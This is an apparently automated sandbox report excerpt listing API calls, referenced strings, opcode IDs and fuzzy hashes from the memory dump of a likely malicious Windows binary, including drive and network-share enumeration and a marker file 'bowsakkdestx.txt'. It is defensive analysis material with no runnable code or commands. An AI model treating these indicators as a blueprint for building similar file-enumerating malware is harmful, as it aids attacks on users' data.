                • WNetEnumResourceW.MPR(?,?,00000000,?), ref: 00410C63
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Enum$AllocGlobalOpenResource_memset
                • String ID:
                • API String ID: 364255426-0
                • Opcode ID: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                • Instruction ID: bd97fe2cb621df6ca28f66a093f1f6e361520364a30ff1ea4190286e2c40543e
                • Opcode Fuzzy Hash: c593f9ddfc12760f3eff0e8065bbbd6a980f194dc76d13cdd9d46ce453e91173
                • Instruction Fuzzy Hash: 0F91B2756083418FD724DF55D891BABB7E1FF84704F14891EE48A87380E7B8A981CB5A
                APIs
                • __getenv_helper_nolock.LIBCMT ref: 00441726
                • _strlen.LIBCMT ref: 00441734
                  • Part of subcall function 00425208: __getptd_noexit.LIBCMT ref: 00425208
                • _strnlen.LIBCMT ref: 004417BF
                • __lock.LIBCMT ref: 004417D0
                • __getenv_helper_nolock.LIBCMT ref: 004417DB
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                • String ID:
                • API String ID: 2168648987-0
                • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction ID: 706a9fbf285425ec29b4e33d2635255339e15eb248031f995e6227ac9da9c0f4
                • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                • Instruction Fuzzy Hash: A131FC31741235ABEB216BA6EC02B9F76949F44B64F54015BF814DB391DF7CC88046AD
                APIs
                • GetLogicalDrives.KERNEL32 ref: 00410A75
                • SetErrorMode.KERNEL32(00000001,00500234,00000002), ref: 00410AE2
                • PathFileExistsA.SHLWAPI(?), ref: 00410AF9
                • SetErrorMode.KERNEL32(00000000), ref: 00410B02
                • GetDriveTypeA.KERNEL32(?), ref: 00410B1B
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: ErrorMode$DriveDrivesExistsFileLogicalPathType
                • String ID:
                • API String ID: 2560635915-0
                • Opcode ID: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                • Instruction ID: e48b338c548d72163c5ae3f73f283317dfaad29deff82c686574d6b9df2ed0f8
                • Opcode Fuzzy Hash: 6431ecd4352623c8ea5b40f1f1ea1a8b08bc26eb066019d8721179985482c109
                • Instruction Fuzzy Hash: 6141F271108340DFC710DF69C885B8BBBE4BB85718F500A2EF089922A2D7B9D584CB97
                APIs
                • _malloc.LIBCMT ref: 0043B70B
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                • _free.LIBCMT ref: 0043B71E
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AllocateHeap_free_malloc
                • String ID:
                • API String ID: 1020059152-0
                • Opcode ID: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                • Instruction ID: cebe638eb0ed40525ab660a1b273922ca7a171140340163af9fc546bca46de76
                • Opcode Fuzzy Hash: 8e512132b4ba77e80ced0f8d2c599a4ead77bd4eaf6f4183de6e41df743542ab
                • Instruction Fuzzy Hash: F411EB31504725EBCB202B76BC85B6A3784DF58364F50512BFA589A291DB3C88408ADC
                APIs
                • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041F085
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0AC
                • DispatchMessageW.USER32(?), ref: 0041F0B6
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041F0C4
                • WaitForSingleObject.KERNEL32(0000000A), ref: 0041F0D2
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                • Instruction ID: 8330a25206e7a7c758b309db49295e470543d34b7ed76d4368c5dbe794fa98e6
                • Opcode Fuzzy Hash: 6d24f8cffcb6546f687f670e27dc83223b8af0f876a489368cdeea614c080f41
                • Instruction Fuzzy Hash: 5C01DB35A4030876EB30AB55EC86FD63B6DE744B00F148022FE04AB1E1D7B9A54ADB98
                APIs
                • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 0041E515
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E53C
                • DispatchMessageW.USER32(?), ref: 0041E546
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041E554
                • WaitForSingleObject.KERNEL32(0000000A), ref: 0041E562
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                • Instruction ID: 59d9cfd0379212e31388a7928d285390ad7449125cd170d7d310b1f6820545b5
                • Opcode Fuzzy Hash: fff4340a71da7ea92c1385820b9327139908f6a11ddf48d1b12da68ebdd54261
                • Instruction Fuzzy Hash: 3301DB35B4030976E720AB51EC86FD67B6DE744B04F144011FE04AB1E1D7F9A549CB98
                APIs
                • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FA53
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA71
                • DispatchMessageW.USER32(?), ref: 0041FA7B
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FA89
                • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FA94
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                • Instruction ID: 7dc02704ba958b7d98511173c4623a4fa8f2b4100db45197b38ae147ea501182
                • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                • Instruction Fuzzy Hash: 6301AE31B4030577EB205B55DC86FA73B6DDB44B40F544061FB04EE1D1D7F9984587A4
                APIs
                • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 0041FE03
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE21
                • DispatchMessageW.USER32(?), ref: 0041FE2B
                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0041FE39
                • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 0041FE44
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                • String ID:
                • API String ID: 1380987712-0
                • Opcode ID: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                • Instruction ID: d705e8d6a79994c6a13c6d22e65b3a6180ae01e64e8e6a22fa5ca061b0d405f5
                • Opcode Fuzzy Hash: 5ffbf9770eb971b4119c0781c76021866953efcd4bea105f367c69870a8c259a
                • Instruction Fuzzy Hash: 3501A931B80308B7EB205B95ED8AF973B6DEB44B00F144061FA04EF1E1D7F5A8468BA4
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                • Instruction ID: 16eedd03d570a769cf24423414cb71a1906862ef28ca1dd771941f38c47b8a04
                • Opcode Fuzzy Hash: b2c1af29de5962b74b57e5661815869f54c56e8a90a0ab9c91a19098a667a223
                • Instruction Fuzzy Hash: C451C3317081089BDB24CE1CD980AAA77B6EF85714B24891FF856CB381DB35EDD18BD9
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memmove
                • String ID: invalid string position$string too long
                • API String ID: 4104443479-4289949731
                • Opcode ID: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                • Instruction ID: c789d4a5c221ce0c411dffae1b259be01e75b302f83ceaf2f45b858c9c7e4579
                • Opcode Fuzzy Hash: 1860cadd0784f8812835e732d2f60387060861baec5cac242feb419a09eb11c6
                • Instruction Fuzzy Hash: 3D311430300204ABDB28DE5CD8859AA77B6EFC17507600A5EF865CB381D739EDC18BAD
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _wcsnlen
                • String ID: U
                • API String ID: 3628947076-3372436214
                • Opcode ID: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                • Instruction ID: 96f9a77ca4cc4fe958c434aa827cb810c13d5acf0ea92317e974609e7887e837
                • Opcode Fuzzy Hash: b6ca082fea440d1ca5cff6801f17e255d65e87a8c4bbbad4e9973a502f76dbd1
                • Instruction Fuzzy Hash: 6521C9717046286BEB10DAA5BC41BBB739CDB85750FD0416BFD08C6190EA79994046AD
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: .\crypto\buffer\buffer.c$C7F
                • API String ID: 2102423945-2013712220
                • Opcode ID: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                • Instruction ID: 54406e9f1970e0e1dce797ef07034894a3cffcceb7efccd845a222dac3d76e8e
                • Opcode Fuzzy Hash: fce9da4f2685e8a546a1aead5558aa77959c7a2ce52c5fe1bdde6675f364ff59
                • Instruction Fuzzy Hash: 91216DB1B443213BE200655DFC83B15B395EB84B19F104127FA18D72C2D2B8BC5982D9
                APIs
                Strings
                • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 0040C687
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: StringUuid$CreateFree
                • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                • API String ID: 3044360575-2335240114
                • Opcode ID: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                • Instruction ID: 0eb901185732211e3be4e37390737b2086ad5c5ed8a4bd7d6c842829bf201ec1
                • Opcode Fuzzy Hash: 5898d431aa7bc51d8275c67bd3d0945cf80b17b08d4c1006f571a635e441fa64
                • Instruction Fuzzy Hash: 6C21D771208341ABD7209F24D844B9BBBE8AF81758F004E6FF88993291D77A9549879A
                APIs
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C48B
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C4A9
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendFolder
                • String ID: bowsakkdestx.txt
                • API String ID: 29327785-2616962270
                • Opcode ID: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                • Instruction ID: 3b6c08389df4e48a430741a1ce4ce94f3584f996b8880ee9781e1533d320f445
                • Opcode Fuzzy Hash: cacc9ec5c69f508a09e097335cbe8ae863f85dc58f645bd4f6fa7f4b17594c00
                • Instruction Fuzzy Hash: 8701DB72B8022873D9306A557C86FFB775C9F51721F0001B7FE08D6181E5E9554646D5
                APIs
                • _malloc.LIBCMT ref: 00423B64
                  • Part of subcall function 00420C62: __FF_MSGBANNER.LIBCMT ref: 00420C79
                  • Part of subcall function 00420C62: __NMSG_WRITE.LIBCMT ref: 00420C80
                  • Part of subcall function 00420C62: RtlAllocateHeap.NTDLL(005D0000,00000000,00000001,?,?,?,?,00423B69,?), ref: 00420CA5
                • std::exception::exception.LIBCMT ref: 00423B82
                • __CxxThrowException@8.LIBCMT ref: 00423B97
                  • Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: AllocateExceptionException@8HeapRaiseThrow_mallocstd::exception::exception
                • String ID: bad allocation
                • API String ID: 3074076210-2104205924
                • Opcode ID: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
                • Instruction ID: 445f5c97f97310cbd08f0009147839d9c604c92f3643d32107fe893a2d7397f3
                • Opcode Fuzzy Hash: cec20dc94eea93260f8f1a03c5a4f6d1a6107b38a2b917b0c89c9f691c6c4a85
                • Instruction Fuzzy Hash: 74F0F97560022D66CB00AF99EC56EDE7BECDF04315F40456FFC04A2282DBBCAA4486DD
                APIs
                • LoadCursorW.USER32(00000000,00007F00), ref: 0041BA4A
                • RegisterClassExW.USER32(00000030), ref: 0041BA73
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: ClassCursorLoadRegister
                • String ID: 0$LPCWSTRszWindowClass
                • API String ID: 1693014935-1496217519
                • Opcode ID: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                • Instruction ID: 39b267f2af3e8e8601893d5e13e9f0aceec8bb1d15aa8544f670d774de374bdc
                • Opcode Fuzzy Hash: fbf28ebe5b3b724a216796b7602f5ba5b22e3d17e3910e7f530213bb4edbfbf6
                • Instruction Fuzzy Hash: 64F0AFB0C042089BEB00DF90D9597DEBBB8BB08308F108259D8187A280D7BA1608CFD9
                APIs
                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C438
                • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0040C44E
                • DeleteFileA.KERNEL32(?), ref: 0040C45B
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Path$AppendDeleteFileFolder
                • String ID: bowsakkdestx.txt
                • API String ID: 610490371-2616962270
                • Opcode ID: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                • Instruction ID: 22f96f022367e4ecd8cb06d74e3ea6c1a096c1ee21cc35b9366b07434c4c4e8f
                • Opcode Fuzzy Hash: 51c9fbb63abd04c953cc1c90cd388c2580edec88c84091088bf86cba3f20ed90
                • Instruction Fuzzy Hash: 60E0807564031C67DB109B60DCC9FD5776C9B04B01F0000B2FF48D10D1D6B495444E55
                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset
                • String ID: p2Q
                • API String ID: 2102423945-1521255505
                • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction ID: 738f0ca8778653557991c93ab9a04937910ac7dae49cf0696bf478295a84fdc8
                • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                • Instruction Fuzzy Hash: C5F03028684750A5F7107750BC667953EC1A735B08F404048E1142A3E2D7FD338C63DD
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memmove_strtok
                • String ID:
                • API String ID: 3446180046-0
                • Opcode ID: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                • Instruction ID: d0e58e2a66e8e3875a5229d26ee444e1e0210206766639419d48370c530ec9d7
                • Opcode Fuzzy Hash: 205b1ec61ce906ac0e6ef9ac2fb6feb778f8951e500b67679f42a44b4349684c
                • Instruction Fuzzy Hash: 7F81B07160020AEFDB14DF59D98079ABBF1FF14304F54492EE40567381D3BAAAA4CB96
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                • String ID:
                • API String ID: 2974526305-0
                • Opcode ID: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                • Instruction ID: 8e6e0b0b404069c1ace538d88af1fa9e5aae20a8402e44ab6f3f0d96efeb0f41
                • Opcode Fuzzy Hash: 2663944f2ecd2356e6bc0f9128c733698aaf16daf3cf10d514d26d316ebfdedf
                • Instruction Fuzzy Hash: 9A51D830B00225FBCB148E69AA40A7F77B1AF11320F94436FF825963D0D7B99D61CB69
                APIs
                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0043C6AD
                • __isleadbyte_l.LIBCMT ref: 0043C6DB
                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C709
                • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 0043C73F
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                • String ID:
                • API String ID: 3058430110-0
                • Opcode ID: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                • Instruction ID: 9bb69ce0c337472f3e835d3bfc0adb25a23875f1fe15b1d3b69bac0ae3c4b713
                • Opcode Fuzzy Hash: 5d9d0dd00b9c666e2ffb8edf641007e90d7f333e82c154efbd4b40f2329fca1d
                • Instruction Fuzzy Hash: 4E31F530600206EFDB218F75CC85BBB7BA5FF49310F15542AE865A72A0D735E851DF98
                APIs
                • CreateFileW.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 0040F125
                • lstrlenA.KERNEL32(?,?,00000000), ref: 0040F198
                • WriteFile.KERNEL32(00000000,?,00000000), ref: 0040F1A1
                • CloseHandle.KERNEL32(00000000), ref: 0040F1A8
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: File$CloseCreateHandleWritelstrlen
                • String ID:
                • API String ID: 1421093161-0
                • Opcode ID: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                • Instruction ID: 4e0a1a2928686de7afe91093b481d52cb6f90b47dd46c4e49af8be4df8d63ea4
                • Opcode Fuzzy Hash: d7c53c20fb31498ecb2e6d2948be234b538ea12271a6e43a57747494780a16e1
                • Instruction Fuzzy Hash: DF31F531A00104EBDB14AF68DC4ABEE7B78EB05704F50813EF9056B6C0D7796A89CBA5
                APIs
                • ___BuildCatchObject.LIBCMT ref: 004C70AB
                  • Part of subcall function 004C77A0: ___BuildCatchObjectHelper.LIBCMT ref: 004C77D2
                  • Part of subcall function 004C77A0: ___AdjustPointer.LIBCMT ref: 004C77E9
                • _UnwindNestedFrames.LIBCMT ref: 004C70C2
                • ___FrameUnwindToState.LIBCMT ref: 004C70D4
                • CallCatchBlock.LIBCMT ref: 004C70F8
                Memory Dump Source
                • Source File: 00000002.00000002.1252295528.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000002.00000002.1252295528.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                • Associated: 00000002.00000002.1252295528.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_400000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                • String ID:
                • API String ID: 2901542994-0
                • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction ID: e860502f941f6c9850043d2e9c4655f99114053cf07e0eb82383b029c5c3ae24
                • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                • Instruction Fuzzy Hash: 2C011736000108BBCF526F56CC01FDA3FAAEF48718F15801EF91866121D33AE9A1DFA5
                APIs
                  • Part of subcall function 00425007: __getptd_noexit.LIBCMT ref: 00425008
                  • Part of subcall function 00425007: __amsg_exit.LIBCMT ref: 00425015
                • __calloc_crt.LIBCMT ref: 00425A01
                  • Part of subcall function 00428C96: __calloc_impl.LIBCMT ref: 00428CA5
                • __lock.LIBCMT ref: 00425A37
